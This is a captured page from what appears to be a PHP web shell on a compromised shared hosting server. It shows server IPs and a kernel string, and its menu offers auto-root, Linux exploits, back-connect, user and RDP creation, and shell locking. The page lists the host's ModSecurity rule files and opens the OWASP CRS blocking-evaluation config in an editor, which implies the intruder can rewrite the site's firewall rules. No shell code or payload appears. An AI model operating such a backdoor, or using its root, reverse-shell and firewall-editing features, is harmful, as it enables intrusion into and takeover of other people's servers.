Linux iad1-shared-b7-18 6.6.49-grsec-jammy+ #10 SMP Thu Sep 12 23:23:08 UTC 2024 x86_64
Apache
: 67.205.6.31 | : 216.73.216.47
Cant Read [ /etc/named.conf ]
8.2.29
fernandoquevedo
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
etc /
modsecurity /
mod_sec3_CRS /
[ HOME SHELL ]
Name
Size
Permission
Action
10_modsecurity_crs_10_config.c...
36.14
KB
-rw-r--r--
999_dreamhost_request_limits.c...
5.18
KB
-rw-r--r--
99_dreamhost_rules.conf
14
KB
-rw-r--r--
99_modsec-crs-setup.conf
31.99
KB
-rw-r--r--
REQUEST-00-LOCAL-WHITELIST.con...
8.83
KB
-rw-r--r--
REQUEST-901-INITIALIZATION.con...
14.37
KB
-rw-r--r--
REQUEST-903.9001-DRUPAL-EXCLUS...
13.24
KB
-rw-r--r--
REQUEST-903.9002-WORDPRESS-EXC...
25.21
KB
-rw-r--r--
REQUEST-903.9003-NEXTCLOUD-EXC...
10.39
KB
-rw-r--r--
REQUEST-903.9004-DOKUWIKI-EXCL...
7.64
KB
-rw-r--r--
REQUEST-905-COMMON-EXCEPTIONS....
1.61
KB
-rw-r--r--
REQUEST-911-METHOD-ENFORCEMENT...
2.91
KB
-rw-r--r--
REQUEST-913-SCANNER-DETECTION....
3.54
KB
-rw-r--r--
REQUEST-920-PROTOCOL-ENFORCEME...
62.98
KB
-rw-r--r--
REQUEST-921-PROTOCOL-ATTACK.co...
20.54
KB
-rw-r--r--
REQUEST-930-APPLICATION-ATTACK...
7.94
KB
-rw-r--r--
REQUEST-931-APPLICATION-ATTACK...
8.72
KB
-rw-r--r--
REQUEST-933-APPLICATION-ATTACK...
32.12
KB
-rw-r--r--
REQUEST-934-APPLICATION-ATTACK...
3.83
KB
-rw-r--r--
REQUEST-942-APPLICATION-ATTACK...
94.3
KB
-rw-r--r--
REQUEST-943-APPLICATION-ATTACK...
5.5
KB
-rw-r--r--
REQUEST-944-APPLICATION-ATTACK...
21.99
KB
-rw-r--r--
REQUEST-949-BLOCKING-EVALUATIO...
7.98
KB
-rw-r--r--
RESPONSE-999-EXCLUSION-RULES-A...
4.03
KB
-rw-r--r--
WPtoolUA.data
318
B
-rw-r--r--
cachefly.ips.data
166
B
-rw-r--r--
crawlers-user-agents.data
786
B
-rw-r--r--
dh_whitelist_ip.data
0
B
-rw-r--r--
fastly.ips.data
189
B
-rw-r--r--
incapsula.ips.data
110
B
-rw-r--r--
java-classes.data
1.78
KB
-rw-r--r--
java-code-leakages.data
264
B
-rw-r--r--
java-errors.data
240
B
-rw-r--r--
lfi-os-files.data
11.44
KB
-rw-r--r--
maxcdn.ips.data
623
B
-rw-r--r--
mod_sec.conf
2.03
KB
-rw-r--r--
modsecurity_46_slr_et_joomla.d...
1.69
KB
-rw-r--r--
modsecurity_46_slr_et_wordpres...
1.69
KB
-rw-r--r--
php-config-directives.data
12.43
KB
-rw-r--r--
php-errors.data
74.21
KB
-rw-r--r--
php-function-names-933150.data
3.33
KB
-rw-r--r--
php-function-names-933151.data
37.21
KB
-rw-r--r--
php-variables.data
610
B
-rw-r--r--
restricted-files.data
3.97
KB
-rw-r--r--
restricted-upload.data
2.45
KB
-rw-r--r--
scanners-headers.data
216
B
-rw-r--r--
scanners-urls.data
418
B
-rw-r--r--
scanners-user-agents.data
1.9
KB
-rw-r--r--
scripting-user-agents.data
717
B
-rw-r--r--
sig_inspect.lua
66.56
KB
-rw-r--r--
spam-mailer.data
84
B
-rw-r--r--
sql-errors.data
4.27
KB
-rw-r--r--
staminus.ips.data
228
B
-rw-r--r--
unix-shell.data
7.65
KB
-rw-r--r--
windows-powershell-commands.da...
7.05
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : REQUEST-949-BLOCKING-EVALUATION.conf
# ------------------------------------------------------------------------ # OWASP CRS ver.4.7.0-dev # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved. # Copyright (c) 2021-2024 CRS project. All rights reserved. # # The OWASP CRS is distributed under # Apache Software License (ASL) version 2 # Please see the enclosed LICENSE file for full details. # ------------------------------------------------------------------------ # # -= Paranoia Level 0 (empty) =- (apply unconditionally) # # Summing up the blocking and detection anomaly scores in phase 1 # even when early blocking is disabled, we need to sum up the scores in phase 1 # this prevents bugs in phase 5 if Apache skips phases because of error handling # See: https://github.com/coreruleset/coreruleset/issues/2319#issuecomment-1047503932 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ "id:949052,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ "id:949152,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949053,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ "id:949153,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949054,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ "id:949154,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949055,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ "id:949155,\ phase:1,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" # at start of phase 2, we reset the aggregate scores to 0 to prevent duplicate counting of per-PL scores # this is necessary because the per-PL scores are counted across phases SecAction \ "id:949059,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=0'" SecAction \ "id:949159,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=0'" # Summing up the blocking and detection anomaly scores in phase 2 SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 1" \ "id:949060,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 1" \ "id:949160,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl1}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 2" \ "id:949061,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 2" \ "id:949161,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl2}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 3" \ "id:949062,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 3" \ "id:949162,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl3}'" SecRule TX:BLOCKING_PARANOIA_LEVEL "@ge 4" \ "id:949063,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.blocking_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecRule TX:DETECTION_PARANOIA_LEVEL "@ge 4" \ "id:949163,\ phase:2,\ pass,\ t:none,\ nolog,\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ setvar:'tx.detection_inbound_anomaly_score=+%{tx.inbound_anomaly_score_pl4}'" SecMarker "BEGIN-REQUEST-BLOCKING-EVAL" # # -=[ Anomaly Mode: Overall Transaction Anomaly Score ]=- # # if early blocking is active, check threshold in phase 1 SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ "id:949111,\ phase:1,\ deny,\ t:none,\ msg:'Inbound Anomaly Score Exceeded in phase 1 (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev',\ chain" SecRule TX:EARLY_BLOCKING "@eq 1" # always check threshold in phase 2 SecRule TX:BLOCKING_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" \ "id:949110,\ phase:2,\ deny,\ t:none,\ msg:'Inbound Anomaly Score Exceeded (Total Score: %{TX.BLOCKING_INBOUND_ANOMALY_SCORE})',\ tag:'anomaly-evaluation',\ tag:'OWASP_CRS',\ ver:'OWASP_CRS/4.7.0-dev'" SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:949012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher) # SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:949014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher) # SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:949016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher) # SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:949018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.7.0-dev',skipAfter:END-REQUEST-949-BLOCKING-EVALUATION" # # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher) # # # -= Paranoia Levels Finished =- # SecMarker "END-REQUEST-949-BLOCKING-EVALUATION"
Close
